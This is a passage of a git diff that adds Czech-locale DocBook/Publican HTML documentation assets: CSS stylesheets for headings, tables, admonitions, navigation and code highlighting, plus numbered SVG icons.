+.figure .title {
+	margin-bottom:2em;
+	padding:0px;
+}
+
+/*document modes*/
+.confidential {
+	background-color:#900;
+	color:White;
+	padding:.5em .5em;
+	text-transform:uppercase;
+	text-align:center;
+}
+
+.longdesc-link {
+	display:none;
+}
+
+.longdesc {
+	display:none;
+}
+
+.prompt {
+	padding:0px .3em;
+}
+
+/*user interface styles*/
+.screen .replaceable {
+}
+
+.guibutton, .guilabel {
+	font-family: "dejavu sans mono","liberation mono", "bitstream vera mono", "dejavu mono", monospace;
+	font-weight: bold;
+}
+
+.example {
+	background-color: #ffffff;
+	border-left: 3px solid #aaaaaa;
+	padding-top: 1px;
+	padding-bottom: 0.1em;
+	padding-left: 1em;
+}
+
+.equation {
+	border-left: 3px solid #aaaaaa;
+	background-color: #ffffff;
+	padding-top: 1px;
+	padding-bottom: 0.1em;
+	padding-left: 1em;
+}
+
+.equation-contents {
+	margin-left: 4em;
+}
+
+div.title {
+	margin-bottom: 1em;
+	font-weight: 14px;
+	font-weight: bold;
+	color: #336699;
+	word-wrap: break-word;
+}
+
+.example-contents {
+	background-color: #ffffff;
+}
+
+.example-contents .para {
+/*	 padding: 10px;*/
+}
+
+/*terminal/console text*/
+.computeroutput, 
+.option {
+	font-family: "dejavu sans mono","liberation mono", "bitstream vera mono", "dejavu mono", monospace;
+	font-weight:bold;
+}
+
+.replaceable {
+	font-style: italic;
+}
+
+.command, .filename, .keycap, .classname, .literal {
+	font-family: "dejavu sans mono","liberation mono", "bitstream vera mono", "dejavu mono", monospace;
+	font-weight:bold;
+}
+
+/* no bold in toc */
+.toc * {
+	font-weight: inherit;
+}
+
+.toc H1 {
+	font-weight: bold;
+}
+
+
+div.programlisting {
+	white-space: pre-wrap; /* css-3 */
+	white-space: -moz-pre-wrap !important; /* Mozilla, since 1999 */
+	white-space: -pre-wrap; /* Opera 4-6 */
+	white-space: -o-pre-wrap; /* Opera 7 */
+	word-wrap: break-word; /* Internet Explorer 5.5+ */
+}
+
+pre {
+	font-family: "dejavu sans mono","liberation mono", "bitstream vera mono", "dejavu mono", monospace;
+	display:block;
+	background-color: #f5f5f5;
+	color: #000000;
+/*	border: 1px solid #aaaaaa; */
+	margin-bottom: 1em;
+	padding:.5em 1em;
+	white-space: pre-wrap; /* css-3 */
+	white-space: -moz-pre-wrap !important; /* Mozilla, since 1999 */
+	white-space: -pre-wrap; /* Opera 4-6 */
+	white-space: -o-pre-wrap; /* Opera 7 */
+	word-wrap: break-word; /* Internet Explorer 5.5+ */
+	font-size: 0.9em;
+	border-style:none;
+	box-shadow: 0 2px 5px #AAAAAA inset;
+	-moz-box-shadow:  0 2px 5px #AAAAAA inset;
+	-webkit-box-shadow: 0 2px 5px #AAAAAA inset;
+	-o-box-shadow: 0 2px 5px #AAAAAA inset;
+}
+
+body.pdf pre {
+	border: 1px solid #AAAAAA;
+	box-shadow: none;
+	-moz-box-shadow: none;
+	-webkit-box-shadow: none;
+	-o-box-shadow: none;
+}
+
+
+pre .replaceable, 
+pre .keycap {
+}
+
+code {
+	font-family: "dejavu sans mono","liberation mono", "bitstream vera mono", "dejavu mono", monospace;
+	white-space: pre-wrap;
+	word-wrap: break-word;
+	font-weight:bold;
+}
+
+.parameter code {
+	display: inline;
+	white-space: pre-wrap; /* css-3 */
+	white-space: -moz-pre-wrap !important; /* Mozilla, since 1999 */
+	white-space: -pre-wrap; /* Opera 4-6 */
+	white-space: -o-pre-wrap; /* Opera 7 */
+	word-wrap: break-word; /* Internet Explorer 5.5+ */
+}
+
+code.email {
+	font-weight: normal;
+	font-family: "liberation sans", "Myriad ", "Bitstream Vera Sans", "Lucida Grande", "Luxi Sans", "Trebuchet MS", helvetica, verdana, arial, sans-serif;
+
+}
+
+/*Notifications*/
+div.warning:before {
+	content:url(../images/warning.png);
+	padding-left: 5px;
+}
+
+div.note:before {
+	content:url(../images/note.png);
+	padding-left: 5px;
+}
+
+div.important:before {
+	content:url(../images/important.png);
+	padding-left: 5px;
+}
+
+div.warning, div.note, div.important {
+	color: black;
+	margin: 0px;
+	padding: 0px;
+	background: none;
+	background-color: white;
+	margin-bottom: 1em;
+	border-bottom: 1px solid #aaaaaa;
+}
+
+div.admonition_header p {
+	margin: 0px;
+	padding: 0px;
+	color: #eeeeec;
+	padding-top: 0px;
+	padding-bottom: 0px;
+	height: 1.4em;
+	line-height: 1.4em;
+	font-size: 17px;
+	display:inline;
+}
+
+div.admonition_header {
+	background-origin:content-box;
+	clear: both;
+	margin: 0px;
+	padding: 0px;
+	margin-top: -40px;
+	padding-left: 58px;
+	line-height: 1.0px;
+	font-size: 1.0px;
+}
+
+div.warning div.admonition_header {
+	background: url(../images/red.png) top left repeat-x;
+	background-color: #590000;
+	background: -webkit-linear-gradient(#a40000,#590000);
+	background: linear-gradient(#a40000,#590000);
+}
+
+div.note div.admonition_header {
+	background: url(../images/green.png) top right repeat-x;
+	background-color: #597800;
+	background: -webkit-linear-gradient(#769f00,#597800);
+	background: linear-gradient(#769f00,#597800);
+}
+
+div.important div.admonition_header {
+	background: url(../images/yellow.png) top right repeat-x;
+	background-color: #a6710f;
+	background: -webkit-linear-gradient(#d08e13,#a6710f);
+	background: linear-gradient(#d08e13,#a6710f);
+}
+
+div.warning p:first-child,
+div.warning div.para:first-child,
+div.note p:first-child,
+div.note div.para:first-child,
+div.important p:first-child,
+div.important div.para:first-child {
+	padding: 0px;
+	margin: 0px;
+}
+
+div.admonition {
+	border: none;
+	border-left: 1px solid #aaaaaa;
+	border-right: 1px solid #aaaaaa;
+	padding:0px;
+	margin:0px;
+	padding-top: 1.5em;
+	padding-bottom: 1em;
+	padding-left: 2em;
+	padding-right: 1em;
+	background-color: #eeeeec;
+	-moz-border-radius: 0px;
+	-webkit-border-radius: 0px;
+	border-radius: 0px;
+}
+
+/*Page Title*/
+#title  {
+	display:block;
+	height:45px;
+	padding-bottom:1em;
+	margin:0px;
+}
+
+#title a.left{
+	display:inline;
+	border:none;
+}
+
+#title a.left img{
+	border:none;
+	float:left;
+	margin:0px;
+	margin-top:.7em;
+}
+
+#title a.right {
+	padding-bottom:1em;
+}
+
+#title a.right img {
+	border:none;
+	float:right;
+	margin:0px;
+	margin-top:.7em;
+}
+
+/*Table*/
+div.table {
+}
+
+table {
+	border: 1px solid #444;
+	width:100%;
+	border-collapse:collapse;
+	table-layout: fixed;
+	word-wrap: break-word;
+}
+
+table.blockquote,
+table.simplelist,
+.calloutlist table {
+	border-style: none;
+}
+
+table th {
+	text-align:left;
+	background-color:#6699cc;
+	padding:.3em .5em;
+	color:white;
+}
+
+table td {
+	padding:.15em .5em;
+}
+
+table tr.even td {
+	background-color:#f5f5f5;
+}
+
+tr:nth-child(even) {
+	background-color: #eeeeee;
+
+}
+
+
+table th p:first-child, table td p:first-child, table  li p:first-child,
+table th div.para:first-child, table td div.para:first-child, table  li div.para:first-child {
+	margin-top:0px;
+	padding-top:0px;
+	display:inline;
+}
+
+th, td {
+	border-style:none;
+	vertical-align: top;
+/* 	border: 1px solid #000; */
+}
+
+.blockquote td, 
+.simplelist th,
+.simplelist td {
+	border: none;
+}
+
+table table td {
+	border-bottom:1px dotted #aaa;
+	background-color:white;
+	padding:.6em 0px;
+}
+
+table table {
+	border:1px solid white;
+}
+
+td.remarkval {
+	color:#444;
+}
+
+td.fieldval {
+	font-weight:bold;
+}
+
+.lbname, .lbtype, .lbdescr, .lbdriver, .lbhost {
+	color:white;
+	font-weight:bold;
+	background-color:#999;
+	width:120px;
+}
+
+td.remarkval {
+	width:230px;
+}
+
+td.tname {
+	font-weight:bold;
+}
+
+th.dbfield {
+	width:120px;
+}
+
+th.dbtype {
+	width:70px;
+}
+
+th.dbdefault {
+	width:70px;
+}
+
+th.dbnul {
+	width:70px;
+}
+
+th.dbkey {
+	width:70px;
+}
+
+span.book {
+	margin-top:4em;
+	display:block;
+	font-size: 11pt;
+}
+
+span.book a{
+	font-weight:bold;
+}
+span.chapter {
+	display:block;
+}
+
+table.simplelist td, .calloutlist table td {
+	border-style: none;
+}
+
+
+table.lt-4-cols.lt-7-rows td {
+	border: none;
+}
+/*to simplify layout*/
+
+
+table.lt-4-cols.gt-14-rows tr:nth-child(odd) {
+	background-color: #fafafa;
+}
+/* to keep simple but stripe rows */ 
+
+
+.gt-8-cols td {
+	border-left: 1px solid #ccc;
+}
+
+.gt-8-cols td:first-child {
+	border-left: 0;
+}
+/* to apply vertical lines to differentiate columns*/
+
+/*Breadcrumbs*/
+#breadcrumbs ul li.first:before {
+	content:" ";
+}
+
+#breadcrumbs {
+	color:#900;
+	padding:3px;
+	margin-bottom:25px;
+}
+
+#breadcrumbs ul {
+	margin-left:0;
+	padding-left:0;
+	display:inline;
+	border:none;
+}
+
+#breadcrumbs ul li {
+	margin-left:0;
+	padding-left:2px;
+	border:none;
+	list-style:none;
+	display:inline;
+}
+
+#breadcrumbs ul li:before {
+	content:"\0020 \0020 \0020 \00BB \0020";
+	color:#333;
+}
+
+dl {
+	margin-top: 0px;
+	margin-left: 28px;
+}
+
+.toc dl {
+	margin-left: 10px;
+}
+
+/*index*/
+.glossary h3, 
+.index h3 {
+	font-size: 20px;
+	color:#aaa;
+	margin:0px;
+}
+
+.indexdiv {
+	margin-bottom:1em;
+}
+
+.glossary dt,
+.index dt {
+	color:#444;
+	padding-top:.5em;
+}
+
+.glossary dl dl dt, 
+.index dl dl dt {
+	color:#777;
+	font-weight:normal;
+	padding-top:0px;
+}
+
+.index dl dl dt:before {
+	content:"- ";
+	color:#ccc;
+}
+
+/*changes*/
+.footnote {
+	font-size: 10px;
+	margin: 0px;
+	color: #222;
+}
+
+.footnotes {
+	margin-bottom: 60px;
+}
+
+table .footnote {
+}
+
+sup {
+	margin:0px;
+	padding:0px;
+	font-size: 10px;
+	padding-left:0px;
+}
+
+.footnote {
+	position:relative;
+}
+
+.footnote sup  {
+	color: black;
+	left: .4em;
+}
+
+.footnote a:link,
+.footnote a:visited {
+	text-decoration:none;
+	border: none;
+}
+
+.footnote .para sup  {
+/*	position:absolute; */
+	vertical-align:text-bottom;
+}
+
+a.footnote {
+	padding-right: 0.5em;
+	text-decoration:none;
+	border: none;
+} 
+
+.footnote sup a:link, 
+.footnote sup a:visited {
+	color:#92917d;
+	text-decoration:none;
+}
+
+.footnote:hover sup a {
+	text-decoration:none;
+}
+
+.footnote p,.footnote div.para {
+	padding-left:1em;
+}
+
+.footnote a:link, 
+.footnote a:visited before{
+	color:#00537c;
+}
+
+.footnote a:hover {
+}
+
+/**/
+.pdf-break {
+}
+
+div.legalnotice {
+}
+
+div.abstract {
+}
+
+div.chapter {
+}
+
+
+div.titlepage, div.titlepage > div, div.titlepage > div > div {
+}
+
+div.preface, div.part {
+}
+
+div.appendix {
+}
+
+div.section {
+}
+
+
+dt.varlistentry {
+}
+
+dd {
+}
+
+div.note .replaceable, 
+div.important .replaceable, 
+div.warning .replaceable, 
+div.note .keycap, 
+div.important .keycap, 
+div.warning .keycap
+{
+}
+
+ul li p:last-child, ul li para:last-child {
+	margin-bottom:0px;
+	padding-bottom:0px;
+}
+
+/*document navigation*/
+.docnav a, .docnav strong {
+	border:none;
+	text-decoration:none;
+	font-weight:normal;
+}
+
+.docnav {
+	list-style:none;
+	margin:0px;
+	padding:0px;
+	position:relative;
+	width:100%;
+	padding-bottom:2em;
+	padding-top:1em;
+        height:2.5em;
+        line-height:2.5em;
+/*
+	border-top:1px dotted #ccc;
+        background-color: rgba(240, 240, 240, 0.9);
+-webkitbox-shadow: 0px .15em .5em rgba(0,0,0,0.2);
+  -moz-box-shadow: 0px .15em .5em rgba(0,0,0,0.2);
+       box-shadow: 0px .15em .5em rgba(0,0,0,0.2);
+*/
+}
+
+.docnav li {
+	list-style:none;
+	margin:0px;
+	padding:0px;
+	display:inline;
+	font-size: 14px;
+}
+
+.docnav li:before {
+	content:" ";
+}
+
+.docnav li.previous, .docnav li.next {
+	position:absolute;
+	top:1.5em;
+}
+
+.docnav li.up, .docnav li.home {
+	margin:0px 1.5em;
+}
+
+.docnav.top li.home {
+	color: #336699;
+	font-size: 22pt;
+	font-weight: bold;
+}
+
+
+.docnav li.previous {
+	left:0px;
+	text-align:left;
+}
+
+.docnav li.next {
+	right:0px;
+	text-align:right;
+}
+
+.docnav li.previous strong, .docnav li.next strong {
+	height: 17px;
+	display: block;
+}
+
+.docnav {
+	margin:0 auto;
+	text-align:center;
+}
+
+.docnav li.next a strong {
+	background:  url(../images/stock-go-forward.png) right 120% no-repeat;
+	padding-top:3px;
+	padding-bottom:4px;
+	padding-right:28px;
+}
+
+.docnav li.previous a strong {
+	background: url(../images/stock-go-back.png) left 120% no-repeat;
+	padding-top:3px;
+	padding-bottom:4px;
+	padding-left:28px;
+	padding-right:0.5em;
+}
+
+.docnav li.home a strong {
+	background: url(../images/stock-home.png) top left no-repeat;
+	padding:5px;
+	padding-left:28px;
+}
+
+.docnav li.up a strong {
+	background: url(../images/stock-go-up.png) top left no-repeat;
+	padding:5px;
+	padding-left:28px;
+}
+
+.docnav a:link, .docnav a:visited {
+	color:#666;
+}
+
+.docnav a:hover, .docnav a:focus, .docnav a:active {
+	color:black;
+}
+
+.docnav a {
+	max-width: 10px;
+	overflow:hidden;
+}
+
+.docnav a:link strong {
+	text-decoration:none;
+}
+
+.docnav {
+	margin:0 auto;
+	text-align:center;
+}
+
+ul.docnav {
+	margin-bottom: 1em;
+}
+/* Reports */
+.reports ul {
+	list-style:none;
+	margin:0px;
+	padding:0px;
+}
+
+.reports li{
+	margin:0px;
+	padding:0px;
+}
+
+.reports li.odd {
+	background-color: #eeeeee;
+	margin:0px;
+	padding:0px;
+}
+
+.reports dl {
+	display:inline;
+	margin:0px;
+	padding:0px;
+	float:right;
+	margin-right: 17em;
+	margin-top:-1.3em;
+}
+
+.reports dt {
+	display:inline;
+	margin:0px;
+	padding:0px;
+}
+
+.reports dd {
+	display:inline;
+	margin:0px;
+	padding:0px;
+	padding-right:.5em;
+}
+
+.reports h2, .reports h3{
+	display:inline;
+	padding-right:.5em;
+	font-size: 14px;
+	font-weight:normal;
+}
+
+.reports div.progress {
+	display:inline;
+	float:right;
+	width:16em;
+	background:#c00 url(../images/shine.png) top left repeat-x;
+	margin:0px;
+	margin-top:-1.3em;
+	padding:0px;
+	border:none;
+}
+
+/*uniform*/
+body.results, body.reports {
+	max-width:57em ;
+	padding:0px;
+}
+
+/*Progress Bar*/
+div.progress {
+	display:block;
+	float:left;
+	width:16em;
+	background:#c00 url(../images/shine.png) top left repeat-x;
+	height:1em;
+}
+
+div.progress span {
+	height:1em;
+	float:left;
+}
+
+div.progress span.translated {
+	background:#6c3 url(../images/shine.png) top left repeat-x;
+}
+
+div.progress span.fuzzy {
+	background:#ff9f00 url(../images/shine.png) top left repeat-x;
+}
+
+
+/*Results*/
+
+.results ul {
+	list-style:none;
+	margin:0px;
+	padding:0px;
+}
+
+.results li{
+	margin:0px;
+	padding:0px;
+}
+
+.results li.odd {
+	background-color: #eeeeee;
+	margin:0px;
+	padding:0px;
+}
+
+.results dl {
+	display:inline;
+	margin:0px;
+	padding:0px;
+	float:right;
+	margin-right: 17em;
+	margin-top:-1.3em;
+}
+
+.results dt {
+	display:inline;
+	margin:0px;
+	padding:0px;
+}
+
+.results dd {
+	display:inline;
+	margin:0px;
+	padding:0px;
+	padding-right:.5em;
+}
+
+.results h2, .results h3 {
+	display:inline;
+	padding-right:.5em;
+	font-size: 14px;
+	font-weight:normal;
+}
+
+.results div.progress {
+	display:inline;
+	float:right;
+	width:16em;
+	background:#c00 url(../images/shine.png) top left repeat-x;
+	margin:0px;
+	margin-top:-1.3em;
+	padding:0px;
+	border:none;
+}
+
+/* Dirty EVIL Mozilla hack for round corners */
+pre {
+	-moz-border-radius:11px;
+	-webkit-border-radius:11px;
+	border-radius: 11px;
+}
+
+.example {
+	-moz-border-radius:0px;
+	-webkit-border-radius:0px;
+	border-radius: 0px;
+}
+
+/* move these invisible fields out of the flow */
+.example > a:first-child,
+.table > a:first-child,
+.procedure > a:first-child {
+    float: left;
+}
+
+.package, .citetitle {
+	font-style: italic;
+}
+
+.titlepage .edition,
+.titlepage .releaseinfo {
+	color: #336699;
+	background-color: transparent;
+	margin-top: 1em;
+	margin-bottom: 1em;
+	font-size: 20px;
+	font-weight: bold;
+	text-align: center;
+}
+
+span.remark {
+	background-color: #ff00ff;
+}
+
+.draft {
+	background-image: url(../images/watermark-draft.png);
+	background-repeat: repeat-y;
+        background-position: center;
+}
+
+.foreignphrase {
+	font-style: inherit;
+}
+
+dt {
+	clear:both;
+}
+
+dt img {
+	border-style: none;
+	max-width: 112px;
+}
+
+dt object {
+	max-width: 112px;
+}
+
+dt .inlinemediaobject, dt object {
+	display: inline;
+	float: left;
+	margin-bottom: 1em;
+	padding-right: 1em;
+	width: 112px;
+}
+
+dl:after {
+	display: block;
+	clear: both;
+	content: "";
+}
+
+.toc dd {
+	padding-bottom: 0px;
+	margin-bottom: 1em;
+	padding-left: 1.3em;
+	margin-left: 0px;
+}
+
+div.toc > dl > dt {
+	padding-bottom: 0px;
+	margin-bottom: 0px;
+	margin-top: 1em;
+}
+
+
+.strikethrough {
+	text-decoration: line-through;
+}
+
+.underline {
+	text-decoration: underline;
+}
+
+.calloutlist img,
+.callout {
+	padding: 0px;
+	margin: 0px;
+	width: 12pt;
+	display: inline;
+	vertical-align: middle;
+}
+
+li.step > a:first-child {
+	display: block;
+}
+
+.stepalternatives {
+	list-style-image: none;
+	list-style-type: upper-alpha;
+}
+.task {
+}
+
+
+.added {
+	background-color: #99ff99;
+}
+
+.changed {
+	background-color: #ffff77;
+}
+
+.deleted {
+	background-color: #ff4455;
+	text-decoration: line-through;
+}
+
+
diff --git a/tmp/cs-CZ/html/Common_Content/css/default.css b/tmp/cs-CZ/html/Common_Content/css/default.css
new file mode 100644
index 000000000..7fb9ada5c
--- /dev/null
+++ b/tmp/cs-CZ/html/Common_Content/css/default.css
@@ -0,0 +1,4 @@
+@import url("common.css");
+@import url("overrides.css");
+@import url("lang.css");
+
diff --git a/tmp/cs-CZ/html/Common_Content/css/epub.css b/tmp/cs-CZ/html/Common_Content/css/epub.css
new file mode 100644
index 000000000..b0ffd43cb
--- /dev/null
+++ b/tmp/cs-CZ/html/Common_Content/css/epub.css
@@ -0,0 +1,115 @@
+/*headings*/
+h1, h2, h3, h4, h5, h6,
+div.producttitle,
+div.subtitle,
+div.author div.author,
+div.translator div.translator,
+div.othercredit div.othercredit,
+div.editor div.editor,
+div.contrib div.contrib,
+.title,
+.titlepage .edition {
+}
+
+div.para {
+	margin-top: 1em;
+}
+/* inline syntax highlighting */
+.perl_Alert {
+	color: #0000ff;
+}
+
+.perl_BaseN {
+	color: #007f00;
+}
+
+.perl_BString {
+	color: #5C3566;
+}
+
+.perl_Char {
+	color: #ff00ff;
+}
+
+.perl_Comment {
+	color: #888888;
+}
+
+
+.perl_DataType {
+	color: #0000ff;
+}
+
+
+.perl_DecVal {
+	color: #00007f;
+}
+
+
+.perl_Error {
+	color: #ff0000;
+}
+
+
+.perl_Float {
+	color: #00007f;
+}
+
+
+.perl_Function {
+	color: #007f00;
+}
+
+
+.perl_IString {
+	color: #5C3566;
+}
+
+
+.perl_Keyword {
+	color: #002F5D;
+}
+
+
+.perl_Operator {
+	color: #ffa500;
+}
+
+
+.perl_Others {
+	color: #b03060;
+}
+
+
+.perl_RegionMarker {
+	color: #96b9ff;
+}
+
+
+.perl_Reserved {
+	color: #9b30ff;
+}
+
+
+.perl_String {
+	color: #5C3566;
+}
+
+
+.perl_Variable {
+	color: #0000ff;
+}
+
+
+.perl_Warning {
+	color: #0000ff;
+}
+
+b, strong {
+	font-weight: bolder;
+}
+
+code.command {
+	font-family: monospace;
+	font-weight: bolder;
+}
diff --git a/tmp/cs-CZ/html/Common_Content/css/lang.css b/tmp/cs-CZ/html/Common_Content/css/lang.css
new file mode 100644
index 000000000..bbfe539ad
--- /dev/null
+++ b/tmp/cs-CZ/html/Common_Content/css/lang.css
@@ -0,0 +1,2 @@
+/* Empty file by default to avoid HTTP error 404 since that file
+ * is loaded from default.css */
diff --git a/tmp/cs-CZ/html/Common_Content/css/overrides.css b/tmp/cs-CZ/html/Common_Content/css/overrides.css
new file mode 100644
index 000000000..7315fbc7f
--- /dev/null
+++ b/tmp/cs-CZ/html/Common_Content/css/overrides.css
@@ -0,0 +1,179 @@
+a:link {
+	color:#0035C7;
+}
+
+a:visited {
+	color:#54638C;
+}
+
+h1 {
+	color:#C70036;
+}
+
+div.producttitle {
+	color:#C70036;
+}
+
+.section h1.title {
+	color:#C70036;
+}
+
+
+h2,h3,h4,h5,h6 {
+	color:#C70036;
+}
+
+.docnav.top li.home {
+        color: #C70036;
+}
+
+
+table {
+	border:1px solid #aaa;
+}
+
+table th {
+	background-color:#900;
+}
+
+table tr.even td {
+	background-color:#f5f5f5;
+}
+
+#title a {
+	height:54px;
+}
+
+.term{
+	color:#C70036;
+}
+
+.revhistory table th {
+	color:#C70036;
+}
+
+.titlepage .edition {
+	color: #C70036;
+}
+
+span.remark{
+	background-color: #ffff00;
+}
+
+/* Styles of block URLs */
+div.url {
+    margin-top: 0.5em;
+}
+div.url + div.url {
+    margin-top: 0;
+}
+
+/* Styles of sidebars */
+div.sidebar {
+    border: 2px solid #aaaaaa;
+    margin-top: 10px;
+    margin-bottom: 10px;
+    padding: 10px;
+    font-size: 90%;
+    background-color: #eeeeee;
+}
+
+div.sidebar > div.titlepage {
+    border-bottom: 1px solid;
+}
+
+div.sidebar > div.titlepage span.emphasis:nth-child(1) > em {
+    color: #666666;
+    font-style: normal;
+    font-variant: small-caps;
+}
+
+/* Modify behaviour within sidebars */
+div.sidebar p.title {
+    margin-bottom: 0;
+    margin-top: 0;
+}
+
+div.sidebar > p, div.sidebar > div.para {
+    margin-top: 1em;
+    margin-bottom: 0;
+}
+
+/* Styles of screens */
+.screen .computeroutput {
+    font-weight: normal;
+}
+
+/* CSS for the banner */
+#banner {
+    position: fixed;
+    top: 0;
+    right: 0;
+    z-index: 2;
+}
+#banner a {
+    display: block;
+    font-size: 13px;
+    font-family: "DejaVu Sans Condensed", "Liberation Sans", "Nimbus Sans L", Tahoma, Geneva, "Helvetica Neue", Helvetica, Arial, sans serif;
+    font-weight: bold;
+    text-decoration: none;
+    text-shadow: 0 0 0.5em #444;
+    border-bottom: none;
+
+    background-color: #9a0000;
+    color: #FFF;
+    text-align: center;
+    box-shadow: 0 0 13px #888;
+}
+#banner .text {
+    display: block;
+    padding: 3px 0;
+    border: 1px solid #bf6060;
+}
+#banner a:hover {
+    color: #ffff99;
+}
+
+@media (min-width: 1000px) {
+    #banner {
+	height: 149px;
+	width: 149px;
+	overflow: hidden;
+	padding: 0;
+	margin: 0;
+    }
+    #banner a {
+	width: 190px;
+	padding: 1px 15px 1px 25px;
+	position: relative;
+	left: 20px;
+	top: -37px;
+
+	-moz-transform-origin: 0 0 ;
+	-moz-transform: rotate(45deg);
+	-moz-box-shadow: 0 0 13px #888;
+
+	-webkit-transform-origin: 0 0 ;
+	-webkit-transform: rotate(45deg);
+	-webkit-box-shadow: 0 0 13px #888;
+
+	-ms-transform-origin: 0 0 ;
+	-ms-transform: rotate(45deg);
+	-ms-box-shadow: 0 0 13px #888;
+
+	transform-origin: 0 0 ;
+	transform: rotate(45deg);
+	box-shadow: 0 0 13px #888;
+    }
+}
+@media (max-width: 999px) {
+    #banner {
+	width: 100%;
+	position: fixed;
+	top: 0;
+	left: 0;
+    }
+    #title {
+	padding-top: 20px;
+    }
+}
diff --git a/tmp/cs-CZ/html/Common_Content/css/print.css b/tmp/cs-CZ/html/Common_Content/css/print.css
new file mode 100644
index 000000000..773d8ae1b
--- /dev/null
+++ b/tmp/cs-CZ/html/Common_Content/css/print.css
@@ -0,0 +1,16 @@
+@import url("common.css");
+@import url("overrides.css");
+@import url("lang.css");
+
+#tocframe {
+	display: none;
+}
+
+body.toc_embeded {
+	margin-left: 30px;
+}
+
+.producttitle {
+	color: #336699;
+}
+
diff --git a/tmp/cs-CZ/html/Common_Content/images/1.png b/tmp/cs-CZ/html/Common_Content/images/1.png
new file mode 100644
index 000000000..ef0beba85
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/1.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/1.svg b/tmp/cs-CZ/html/Common_Content/images/1.svg
new file mode 100644
index 000000000..4c6bf5795
--- /dev/null
+++ b/tmp/cs-CZ/html/Common_Content/images/1.svg
@@ -0,0 +1,27 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;fill:#000000;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 17.853468,22.008438 -2.564941,0 0,-7.022461 c -5e-6,-0.143873 -5e-6,-0.315422 0,-0.514648 0.0055,-0.204745 0.01106,-0.415031 0.0166,-0.63086 0.01106,-0.221345 0.01936,-0.442699 0.0249,-0.664062 0.01106,-0.221345 0.01936,-0.423331 0.0249,-0.605957 -0.02767,0.03321 -0.07471,0.08302 -0.141113,0.149414 -0.06641,0.06642 -0.141118,0.141122 -0.224122,0.224121 -0.08301,0.07748 -0.168786,0.157724 -0.257324,0.240723 -0.08854,0.08302 -0.17432,0.157723 -0.257324,0.224121 l -1.394531,1.120605 -1.245117,-1.543945 3.909668,-3.1127931 2.108398,0 0,12.1357421"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/html/Common_Content/images/10.png b/tmp/cs-CZ/html/Common_Content/images/10.png
new file mode 100644
index 000000000..05f22391e
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/10.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/10.svg b/tmp/cs-CZ/html/Common_Content/images/10.svg
new file mode 100644
index 000000000..0edda5b6f
--- /dev/null
+++ b/tmp/cs-CZ/html/Common_Content/images/10.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 13.215925,22.008438 -2.564941,0 0,-7.022461 c -4e-6,-0.143873 -4e-6,-0.315422 0,-0.514648 0.0055,-0.204745 0.01106,-0.415031 0.0166,-0.63086 0.01106,-0.221345 0.01936,-0.442699 0.0249,-0.664062 0.01106,-0.221345 0.01936,-0.423331 0.0249,-0.605957 -0.02767,0.03321 -0.07471,0.08302 -0.141113,0.149414 -0.06641,0.06642 -0.141118,0.141122 -0.224121,0.224121 -0.08301,0.07748 -0.168787,0.157724 -0.257325,0.240723 -0.08854,0.08302 -0.1743194,0.157723 -0.2573238,0.224121 L 8.442976,14.529434 7.1978588,12.985489 11.107527,9.8726959 l 2.108398,0 0,12.1357421"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 24.6378,15.940567 c -9e-6,0.979497 -0.07748,1.853845 -0.232422,2.623047 -0.149422,0.769208 -0.392912,1.422202 -0.730468,1.958984 -0.332039,0.536785 -0.763679,0.94629 -1.294922,1.228516 -0.525722,0.282226 -1.162115,0.42334 -1.90918,0.42334 -0.702803,0 -1.314294,-0.141114 -1.834473,-0.42334 -0.520184,-0.282226 -0.951824,-0.691731 -1.294922,-1.228516 -0.3431,-0.536782 -0.600424,-1.189776 -0.771972,-1.958984 -0.166016,-0.769202 -0.249024,-1.64355 -0.249024,-2.623047 0,-0.979485 0.07471,-1.8566 0.224121,-2.631348 0.154948,-0.77473 0.398437,-1.430491 0.730469,-1.967285 0.33203,-0.536772 0.760903,-0.946277 1.286621,-1.228515 0.525713,-0.2877487 1.162106,-0.4316287 1.90918,-0.431641 0.69726,1.23e-5 1.305984,0.1411254 1.826172,0.42334 0.520175,0.282238 0.954582,0.691743 1.303223,1.228515 0.348624,0.536794 0.608715,1.192555 0.780273,1.967286 0.171541,0.774747 0.257315,1.654629 0.257324,2.639648 m -5.760742,0 c -3e-6,1.383468 0.118975,2.423832 0.356934,3.121094 0.237952,0.697268 0.650223,1.0459 1.236816,1.045898 0.575516,2e-6 0.987787,-0.345863 1.236816,-1.037597 0.254552,-0.691729 0.38183,-1.734859 0.381836,-3.129395 -6e-6,-1.38899 -0.127284,-2.43212 -0.381836,-3.129395 -0.249029,-0.702789 -0.6613,-1.054188 -1.236816,-1.054199 -0.293299,1.1e-5 -0.542322,0.08855 -0.74707,0.265625 -0.199223,0.177093 -0.362471,0.439951 -0.489746,0.788574 -0.127282,0.348642 -0.218591,0.785816 -0.273926,1.311524 -0.05534,0.52019 